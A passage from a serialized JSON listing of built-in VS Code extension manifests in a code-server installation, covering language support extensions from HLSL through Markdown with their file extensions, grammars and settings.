Languages"],"contributes":{"languages":[{"id":"hlsl","extensions":[".hlsl",".hlsli",".fx",".fxh",".vsh",".psh",".cginc",".compute"],"aliases":["HLSL","hlsl"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"hlsl","path":"./syntaxes/hlsl.tmLanguage.json","scopeName":"source.hlsl"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/hlsl","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.html"},"manifest":{"name":"html","displayName":"HTML Language Basics","description":"Provides syntax highlighting, bracket matching & snippets in HTML files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ./build/update-grammar.mjs"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"html","extensions":[".html",".htm",".shtml",".xhtml",".xht",".mdoc",".jsp",".asp",".aspx",".jshtm",".volt",".ejs",".rhtml"],"aliases":["HTML","htm","html","xhtml"],"mimetypes":["text/html","text/x-jshtm","text/template","text/ng-template","application/xhtml+xml"],"configuration":"./language-configuration.json"}],"grammars":[{"scopeName":"text.html.basic","path":"./syntaxes/html.tmLanguage.json","embeddedLanguages":{"text.html":"html","source.css":"css","source.js":"javascript","source.python":"python","source.smarty":"smarty"},"tokenTypes":{"meta.tag string.quoted":"other"}},{"language":"html","scopeName":"text.html.derivative","path":"./syntaxes/html-derivative.tmLanguage.json","embeddedLanguages":{"text.html":"html","source.css":"css","source.js":"javascript","source.python":"python","source.smarty":"smarty"},"tokenTypes":{"meta.tag string.quoted":"other"}}],"snippets":[{"language":"html","path":"./snippets/html.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/html","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.html-language-features"},"manifest":{"name":"html-language-features","displayName":"HTML Language Features","description":"Provides rich language support for HTML and Handlebar files","version":"1.0.0","publisher":"vscode","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.77.0"},"icon":"icons/html.png","activationEvents":["onLanguage:html","onLanguage:handlebars"],"enabledApiProposals":["extensionsAny"],"main":"./client/dist/node/htmlClientMain","browser":"./client/dist/browser/htmlClientMain","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"categories":["Programming Languages"],"contributes":{"configuration":{"id":"html","order":20,"type":"object","title":"HTML","properties":{"html.completion.attributeDefaultValue":{"type":"string","scope":"resource","enum":["doublequotes","singlequotes","empty"],"enumDescriptions":["Attribute value is set to \"\".","Attribute value is set to ''.","Attribute value is not set."],"default":"doublequotes","markdownDescription":"Controls the default value for attributes when completion is accepted."},"html.customData":{"type":"array","markdownDescription":"A list of relative file paths pointing to JSON files following the [custom data format](https://github.com/microsoft/vscode-html-languageservice/blob/master/docs/customData.md).\n\nVS Code loads custom data on startup to enhance its HTML support for the custom HTML tags, attributes and attribute values you specify in the JSON files.\n\nThe file paths are relative to workspace and only workspace folder settings are considered.","default":[],"items":{"type":"string"},"scope":"resource"},"html.format.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable default HTML formatter."},"html.format.wrapLineLength":{"type":"integer","scope":"resource","default":120,"description":"Maximum amount of characters per line (0 = disable)."},"html.format.unformatted":{"type":["string","null"],"scope":"resource","default":"wbr","markdownDescription":"List of tags, comma separated, that shouldn't be reformatted. `null` defaults to all tags listed at https://www.w3.org/TR/html5/dom.html#phrasing-content."},"html.format.contentUnformatted":{"type":["string","null"],"scope":"resource","default":"pre,code,textarea","markdownDescription":"List of tags, comma separated, where the content shouldn't be reformatted. `null` defaults to the `pre` tag."},"html.format.indentInnerHtml":{"type":"boolean","scope":"resource","default":false,"markdownDescription":"Indent `` and `` sections."},"html.format.preserveNewLines":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether existing line breaks before elements should be preserved. Only works before elements, not inside tags or for text."},"html.format.maxPreserveNewLines":{"type":["number","null"],"scope":"resource","default":null,"markdownDescription":"Maximum number of line breaks to be preserved in one chunk. Use `null` for unlimited."},"html.format.indentHandlebars":{"type":"boolean","scope":"resource","default":false,"markdownDescription":"Format and indent `{{#foo}}` and `{{/foo}}`."},"html.format.extraLiners":{"type":["string","null"],"scope":"resource","default":"head, body, /html","markdownDescription":"List of tags, comma separated, that should have an extra newline before them. `null` defaults to `\"head, body, /html\"`."},"html.format.wrapAttributes":{"type":"string","scope":"resource","default":"auto","enum":["auto","force","force-aligned","force-expand-multiline","aligned-multiple","preserve","preserve-aligned"],"enumDescriptions":["Wrap attributes only when line length is exceeded.","Wrap each attribute except first.","Wrap each attribute except first and keep aligned.","Wrap each attribute.","Wrap when line length is exceeded, align attributes vertically.","Preserve wrapping of attributes.","Preserve wrapping of attributes but align."],"description":"Wrap attributes."},"html.format.wrapAttributesIndentSize":{"type":["number","null"],"scope":"resource","default":null,"markdownDescription":"Indent wrapped attributes to after N characters. Use `null` to use the default indent size. Ignored if `#html.format.wrapAttributes#` is set to `aligned`."},"html.format.templating":{"type":"boolean","scope":"resource","default":false,"description":"Honor django, erb, handlebars and php templating language tags."},"html.format.unformattedContentDelimiter":{"type":"string","scope":"resource","default":"","markdownDescription":"Keep text content together between this string."},"html.suggest.html5":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether the built-in HTML language support suggests HTML5 tags, properties and values."},"html.suggest.hideEndTagSuggestions":{"type":"boolean","scope":"resource","default":false,"description":"Controls whether the built-in HTML language support suggests closing tags. When disabled, end tag completions like `` will not be shown."},"html.validate.scripts":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether the built-in HTML language support validates embedded scripts."},"html.validate.styles":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether the built-in HTML language support validates embedded styles."},"html.autoCreateQuotes":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Enable/disable auto creation of quotes for HTML attribute assignment. The type of quotes can be configured by `#html.completion.attributeDefaultValue#`."},"html.autoClosingTags":{"type":"boolean","scope":"resource","default":true,"description":"Enable/disable autoclosing of HTML tags."},"html.hover.documentation":{"type":"boolean","scope":"resource","default":true,"description":"Show tag and attribute documentation in hover."},"html.hover.references":{"type":"boolean","scope":"resource","default":true,"description":"Show references to MDN in hover."},"html.mirrorCursorOnMatchingTag":{"type":"boolean","scope":"resource","default":false,"description":"Enable/disable mirroring cursor on matching HTML tag.","deprecationMessage":"Deprecated in favor of `editor.linkedEditing`"},"html.trace.server":{"type":"string","scope":"window","enum":["off","messages","verbose"],"default":"off","description":"Traces the communication between VS Code and the HTML language server."}}},"configurationDefaults":{"[html]":{"editor.suggest.insertMode":"replace"},"[handlebars]":{"editor.suggest.insertMode":"replace"}},"jsonValidation":[{"fileMatch":"*.html-data.json","url":"https://raw.githubusercontent.com/microsoft/vscode-html-languageservice/master/docs/customData.schema.json"},{"fileMatch":"package.json","url":"./schemas/package.schema.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/html-language-features","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.ini"},"manifest":{"name":"ini","displayName":"Ini Language Basics","description":"Provides syntax highlighting and bracket matching in Ini files.","version":"1.0.0","private":true,"publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin textmate/ini.tmbundle Syntaxes/Ini.plist ./syntaxes/ini.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"ini","extensions":[".ini"],"aliases":["Ini","ini"],"configuration":"./ini.language-configuration.json"},{"id":"properties","extensions":[".conf",".properties",".cfg",".directory",".gitattributes",".gitconfig",".gitmodules",".editorconfig",".repo"],"filenames":["gitconfig"],"filenamePatterns":["**/.config/git/config","**/.git/config"],"aliases":["Properties","properties"],"configuration":"./properties.language-configuration.json"}],"grammars":[{"language":"ini","scopeName":"source.ini","path":"./syntaxes/ini.tmLanguage.json"},{"language":"properties","scopeName":"source.ini","path":"./syntaxes/ini.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/ini","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.ipynb"},"manifest":{"name":"ipynb","displayName":".ipynb Support","description":"Provides basic support for opening and reading Jupyter's .ipynb notebook files","publisher":"vscode","version":"1.0.0","license":"MIT","icon":"media/icon.png","engines":{"vscode":"^1.57.0"},"enabledApiProposals":["diffContentOptions"],"activationEvents":["onNotebook:jupyter-notebook","onNotebookSerializer:interactive","onNotebookSerializer:repl"],"extensionKind":["workspace","ui"],"main":"./dist/ipynbMain.node.js","browser":"./dist/browser/ipynbMain.browser.js","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"contributes":{"configuration":[{"properties":{"ipynb.pasteImagesAsAttachments.enabled":{"type":"boolean","scope":"resource","markdownDescription":"Enable/disable pasting of images into Markdown cells in ipynb notebook files. Pasted images are inserted as attachments to the cell.","default":true},"ipynb.experimental.serialization":{"type":"boolean","scope":"resource","markdownDescription":"Experimental feature to serialize the Jupyter notebook in a worker thread.","default":true,"tags":["experimental"]}}}],"commands":[{"command":"ipynb.newUntitledIpynb","title":"New Jupyter Notebook","shortTitle":"Jupyter Notebook","category":"Create"},{"command":"ipynb.openIpynbInNotebookEditor","title":"Open IPYNB File In Notebook Editor"},{"command":"ipynb.cleanInvalidImageAttachment","title":"Clean Invalid Image Attachment Reference"},{"command":"notebook.cellOutput.copy","title":"Copy Cell Output","category":"Notebook"},{"command":"notebook.cellOutput.addToChat","title":"Add Cell Output to Chat","category":"Notebook","enablement":"chatIsEnabled"},{"command":"notebook.cellOutput.openInTextEditor","title":"Open Cell Output in Text Editor","category":"Notebook"}],"notebooks":[{"type":"jupyter-notebook","displayName":"Jupyter Notebook","selector":[{"filenamePattern":"*.ipynb"}],"priority":"default"}],"notebookRenderer":[{"id":"vscode.markdown-it-cell-attachment-renderer","displayName":"Markdown-It ipynb Cell Attachment renderer","entrypoint":{"extends":"vscode.markdown-it-renderer","path":"./notebook-out/cellAttachmentRenderer.js"}}],"menus":{"file/newFile":[{"command":"ipynb.newUntitledIpynb","group":"notebook"}],"commandPalette":[{"command":"ipynb.newUntitledIpynb"},{"command":"ipynb.openIpynbInNotebookEditor","when":"false"},{"command":"ipynb.cleanInvalidImageAttachment","when":"false"},{"command":"notebook.cellOutput.copy","when":"notebookCellHasOutputs"},{"command":"notebook.cellOutput.openInTextEditor","when":"false"}],"webview/context":[{"command":"notebook.cellOutput.copy","when":"webviewId == 'notebook.output' && webviewSection == 'image'","group":"context@1"},{"command":"notebook.cellOutput.copy","when":"webviewId == 'notebook.output' && webviewSection == 'text'"},{"command":"notebook.cellOutput.addToChat","when":"webviewId == 'notebook.output' && (webviewSection == 'text' || webviewSection == 'image')","group":"context@2"},{"command":"notebook.cellOutput.openInTextEditor","when":"webviewId == 'notebook.output' && webviewSection == 'text'"}]}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/ipynb","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.jake"},"manifest":{"name":"jake","publisher":"vscode","description":"Extension to add Jake capabilities to VS Code.","displayName":"Jake support for VS Code","icon":"images/cowboy_hat.png","version":"1.0.0","license":"MIT","engines":{"vscode":"*"},"categories":["Other"],"main":"./dist/main","activationEvents":["onTaskType:jake"],"capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"contributes":{"configuration":{"id":"jake","type":"object","title":"Jake","properties":{"jake.autoDetect":{"scope":"application","type":"string","enum":["off","on"],"default":"off","description":"Controls enablement of Jake task detection. Jake task detection can cause files in any open workspace to be executed."}}},"taskDefinitions":[{"type":"jake","required":["task"],"properties":{"task":{"type":"string","description":"The Jake task to customize."},"file":{"type":"string","description":"The Jake file that provides the task. Can be omitted."}},"when":"shellExecutionSupported"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/jake","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.java"},"manifest":{"name":"java","displayName":"Java Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in Java files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin redhat-developer/vscode-java language-support/java/java.tmLanguage.json ./syntaxes/java.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"java","extensions":[".java",".jav"],"aliases":["Java","java"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"java","scopeName":"source.java","path":"./syntaxes/java.tmLanguage.json"}],"snippets":[{"language":"java","path":"./snippets/java.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/java","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.javascript"},"manifest":{"name":"javascript","displayName":"JavaScript Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in JavaScript files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"categories":["Programming Languages"],"contributes":{"configurationDefaults":{"[javascript]":{"editor.maxTokenizationLineLength":2500}},"languages":[{"id":"javascriptreact","aliases":["JavaScript JSX","JavaScript React","jsx"],"extensions":[".jsx"],"configuration":"./javascript-language-configuration.json"},{"id":"javascript","aliases":["JavaScript","javascript","js"],"extensions":[".js",".es6",".mjs",".cjs",".pac"],"filenames":["jakefile"],"firstLine":"^#!.*\\bnode","mimetypes":["text/javascript"],"configuration":"./javascript-language-configuration.json"},{"id":"jsx-tags","aliases":[],"configuration":"./tags-language-configuration.json"}],"grammars":[{"language":"javascriptreact","scopeName":"source.js.jsx","path":"./syntaxes/JavaScriptReact.tmLanguage.json","embeddedLanguages":{"meta.tag.js":"jsx-tags","meta.tag.without-attributes.js":"jsx-tags","meta.tag.attributes.js.jsx":"javascriptreact","meta.embedded.expression.js":"javascriptreact"},"tokenTypes":{"punctuation.definition.template-expression":"other","entity.name.type.instance.jsdoc":"other","entity.name.function.tagged-template":"other","meta.import string.quoted":"other","variable.other.jsdoc":"other"}},{"language":"javascript","scopeName":"source.js","path":"./syntaxes/JavaScript.tmLanguage.json","embeddedLanguages":{"meta.tag.js":"jsx-tags","meta.tag.without-attributes.js":"jsx-tags","meta.tag.attributes.js":"javascript","meta.embedded.expression.js":"javascript"},"tokenTypes":{"punctuation.definition.template-expression":"other","entity.name.type.instance.jsdoc":"other","entity.name.function.tagged-template":"other","meta.import string.quoted":"other","variable.other.jsdoc":"other"}},{"scopeName":"source.js.regexp","path":"./syntaxes/Regular Expressions (JavaScript).tmLanguage"}],"semanticTokenScopes":[{"language":"javascript","scopes":{"property":["variable.other.property.js"],"property.readonly":["variable.other.constant.property.js"],"variable":["variable.other.readwrite.js"],"variable.readonly":["variable.other.constant.object.js"],"function":["entity.name.function.js"],"namespace":["entity.name.type.module.js"],"variable.defaultLibrary":["support.variable.js"],"function.defaultLibrary":["support.function.js"]}},{"language":"javascriptreact","scopes":{"property":["variable.other.property.jsx"],"property.readonly":["variable.other.constant.property.jsx"],"variable":["variable.other.readwrite.jsx"],"variable.readonly":["variable.other.constant.object.jsx"],"function":["entity.name.function.jsx"],"namespace":["entity.name.type.module.jsx"],"variable.defaultLibrary":["support.variable.js"],"function.defaultLibrary":["support.function.js"]}}],"snippets":[{"language":"javascript","path":"./snippets/javascript.code-snippets"},{"language":"javascriptreact","path":"./snippets/javascript.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/javascript","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.json"},"manifest":{"name":"json","displayName":"JSON Language Basics","description":"Provides syntax highlighting & bracket matching in JSON files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ./build/update-grammars.js"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"json","aliases":["JSON","json"],"extensions":[".json",".bowerrc",".jscsrc",".webmanifest",".js.map",".css.map",".ts.map",".har",".jslintrc",".jsonld",".geojson",".ipynb",".vuerc"],"filenames":["composer.lock",".watchmanconfig"],"mimetypes":["application/json","application/manifest+json"],"configuration":"./language-configuration.json"},{"id":"jsonc","aliases":["JSON with Comments"],"extensions":[".jsonc",".eslintrc",".eslintrc.json",".jsfmtrc",".jshintrc",".swcrc",".hintrc",".babelrc",".toolset.jsonc"],"filenames":["babel.config.json","bun.lock",".babelrc.json",".ember-cli","typedoc.json"],"configuration":"./language-configuration.json"},{"id":"jsonl","aliases":["JSON Lines"],"extensions":[".jsonl",".ndjson"],"filenames":[],"configuration":"./language-configuration.json"},{"id":"snippets","aliases":["Code Snippets"],"extensions":[".code-snippets"],"filenamePatterns":["**/User/snippets/*.json","**/User/profiles/*/snippets/*.json","**/snippets*.json"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"json","scopeName":"source.json","path":"./syntaxes/JSON.tmLanguage.json"},{"language":"jsonc","scopeName":"source.json.comments","path":"./syntaxes/JSONC.tmLanguage.json"},{"language":"jsonl","scopeName":"source.json.lines","path":"./syntaxes/JSONL.tmLanguage.json"},{"language":"snippets","scopeName":"source.json.comments.snippets","path":"./syntaxes/snippets.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/json","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.json-language-features"},"manifest":{"name":"json-language-features","displayName":"JSON Language Features","description":"Provides rich language support for JSON files.","version":"1.0.0","publisher":"vscode","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.77.0"},"enabledApiProposals":["extensionsAny"],"icon":"icons/json.png","activationEvents":["onLanguage:json","onLanguage:jsonc","onLanguage:snippets","onCommand:json.validate"],"main":"./client/dist/node/jsonClientMain","browser":"./client/dist/browser/jsonClientMain","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":"limited","description":"The extension requires workspace trust to load schemas from http and https."}},"categories":["Programming Languages"],"contributes":{"configuration":{"id":"json","order":20,"type":"object","title":"JSON","properties":{"json.schemas":{"type":"array","scope":"resource","description":"Associate schemas to JSON files in the current project.","items":{"type":"object","default":{"fileMatch":["/myfile"],"url":"schemaURL"},"properties":{"url":{"type":"string","default":"/user.schema.json","description":"A URL or absolute file path to a schema. Can be a relative path (starting with './') in workspace and workspace folder settings."},"fileMatch":{"type":"array","items":{"type":"string","default":"MyFile.json","description":"A file pattern that can contain '*' and '**' to match against when resolving JSON files to schemas. When beginning with '!', it defines an exclusion pattern."},"minItems":1,"description":"An array of file patterns to match against when resolving JSON files to schemas. `*` and '**' can be used as a wildcard. Exclusion patterns can also be defined and start with '!'. A file matches when there is at least one matching pattern and the last matching pattern is not an exclusion pattern."},"schema":{"$ref":"http://json-schema.org/draft-07/schema#","description":"The schema definition for the given URL. The schema only needs to be provided to avoid accesses to the schema URL."}}}},"json.validate.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable JSON validation."},"json.format.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable default JSON formatter"},"json.format.keepLines":{"type":"boolean","scope":"window","default":false,"description":"Keep all existing new lines when formatting."},"json.trace.server":{"type":"string","scope":"window","enum":["off","messages","verbose"],"default":"off","description":"Traces the communication between VS Code and the JSON language server."},"json.colorDecorators.enable":{"type":"boolean","scope":"window","default":true,"description":"Enables or disables color decorators","deprecationMessage":"The setting `json.colorDecorators.enable` has been deprecated in favor of `editor.colorDecorators`."},"json.maxItemsComputed":{"type":"number","default":5000,"description":"The maximum number of outline symbols and folding regions computed (limited for performance reasons)."},"json.schemaDownload.enable":{"type":"boolean","default":true,"description":"When enabled, JSON schemas can be fetched from http and https locations.","tags":["usesOnlineServices"]}}},"configurationDefaults":{"[json]":{"editor.quickSuggestions":{"strings":true},"editor.suggest.insertMode":"replace"},"[jsonc]":{"editor.quickSuggestions":{"strings":true},"editor.suggest.insertMode":"replace"},"[snippets]":{"editor.quickSuggestions":{"strings":true},"editor.suggest.insertMode":"replace"}},"jsonValidation":[{"fileMatch":"*.schema.json","url":"http://json-schema.org/draft-07/schema#"}],"commands":[{"command":"json.clearCache","title":"Clear Schema Cache","category":"JSON"},{"command":"json.sort","title":"Sort Document","category":"JSON"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/json-language-features","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.julia"},"manifest":{"name":"julia","displayName":"Julia Language Basics","description":"Provides syntax highlighting & bracket matching in Julia files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin JuliaEditorSupport/atom-language-julia grammars/julia_vscode.json ./syntaxes/julia.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"julia","aliases":["Julia","julia"],"extensions":[".jl"],"firstLine":"^#!\\s*/.*\\bjulia[0-9.-]*\\b","configuration":"./language-configuration.json"},{"id":"juliamarkdown","aliases":["Julia Markdown","juliamarkdown"],"extensions":[".jmd"]}],"grammars":[{"language":"julia","scopeName":"source.julia","path":"./syntaxes/julia.tmLanguage.json","embeddedLanguages":{"meta.embedded.inline.cpp":"cpp","meta.embedded.inline.javascript":"javascript","meta.embedded.inline.python":"python","meta.embedded.inline.r":"r","meta.embedded.inline.sql":"sql"}}],"configurationDefaults":{"[julia]":{"editor.defaultColorDecorators":"never"}}}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/julia","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.latex"},"manifest":{"name":"latex","displayName":"LaTeX Language Basics","description":"Provides syntax highlighting and bracket matching for TeX, LaTeX and BibTeX.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ./build/update-grammars.js"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"tex","aliases":["TeX","tex"],"extensions":[".sty",".cls",".bbx",".cbx"],"configuration":"latex-language-configuration.json"},{"id":"latex","aliases":["LaTeX","latex"],"extensions":[".tex",".ltx",".ctx"],"configuration":"latex-language-configuration.json"},{"id":"bibtex","aliases":["BibTeX","bibtex"],"extensions":[".bib"]},{"id":"cpp_embedded_latex","configuration":"latex-cpp-embedded-language-configuration.json","aliases":[]},{"id":"markdown_latex_combined","configuration":"markdown-latex-combined-language-configuration.json","aliases":[]}],"grammars":[{"language":"tex","scopeName":"text.tex","path":"./syntaxes/TeX.tmLanguage.json","unbalancedBracketScopes":["keyword.control.ifnextchar.tex","punctuation.math.operator.tex"]},{"language":"latex","scopeName":"text.tex.latex","path":"./syntaxes/LaTeX.tmLanguage.json","unbalancedBracketScopes":["keyword.control.ifnextchar.tex","punctuation.math.operator.tex"],"embeddedLanguages":{"source.cpp":"cpp_embedded_latex","source.css":"css","text.html":"html","source.java":"java","source.js":"javascript","source.julia":"julia","source.lua":"lua","source.python":"python","source.ruby":"ruby","source.ts":"typescript","text.xml":"xml","source.yaml":"yaml","meta.embedded.markdown_latex_combined":"markdown_latex_combined"}},{"language":"bibtex","scopeName":"text.bibtex","path":"./syntaxes/Bibtex.tmLanguage.json"},{"language":"markdown_latex_combined","scopeName":"text.tex.markdown_latex_combined","path":"./syntaxes/markdown-latex-combined.tmLanguage.json"},{"language":"cpp_embedded_latex","scopeName":"source.cpp.embedded.latex","path":"./syntaxes/cpp-grammar-bailout.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/latex","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.less"},"manifest":{"name":"less","displayName":"Less Language Basics","description":"Provides syntax highlighting, bracket matching and folding in Less files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ./build/update-grammar.js"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"less","aliases":["Less","less"],"extensions":[".less"],"mimetypes":["text/x-less","text/less"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"less","scopeName":"source.css.less","path":"./syntaxes/less.tmLanguage.json"}],"problemMatchers":[{"name":"lessc","label":"Lessc compiler","owner":"lessc","source":"less","fileLocation":"absolute","pattern":{"regexp":"(.*)\\sin\\s(.*)\\son line\\s(\\d+),\\scolumn\\s(\\d+)","message":1,"file":2,"line":3,"column":4}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/less","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.log"},"manifest":{"name":"log","displayName":"Log","description":"Provides syntax highlighting for files with .log extension.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin emilast/vscode-logfile-highlighter syntaxes/log.tmLanguage ./syntaxes/log.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"log","extensions":[".log","*.log.?"],"aliases":["Log"]}],"grammars":[{"language":"log","scopeName":"text.log","path":"./syntaxes/log.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/log","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.lua"},"manifest":{"name":"lua","displayName":"Lua Language Basics","description":"Provides syntax highlighting and bracket matching in Lua files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin sumneko/lua.tmbundle Syntaxes/Lua.plist ./syntaxes/lua.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"lua","extensions":[".lua"],"aliases":["Lua","lua"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"lua","scopeName":"source.lua","path":"./syntaxes/lua.tmLanguage.json","tokenTypes":{"comment.line.double-dash.doc.lua":"other"}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/lua","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.make"},"manifest":{"name":"make","displayName":"Make Language Basics","description":"Provides syntax highlighting and bracket matching in Make files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin fadeevab/make.tmbundle Syntaxes/Makefile.plist ./syntaxes/make.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"makefile","aliases":["Makefile","makefile"],"extensions":[".mak",".mk"],"filenames":["Makefile","makefile","GNUmakefile","OCamlMakefile"],"firstLine":"^#!\\s*/usr/bin/make","configuration":"./language-configuration.json"}],"grammars":[{"language":"makefile","scopeName":"source.makefile","path":"./syntaxes/make.tmLanguage.json","tokenTypes":{"string.interpolated":"other"}}],"configurationDefaults":{"[makefile]":{"editor.insertSpaces":false}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/make","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.markdown"},"manifest":{"name":"markdown","displayName":"Markdown Language Basics","description":"Provides snippets and syntax highlighting for Markdown.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.20.0"},"categories":["Programming 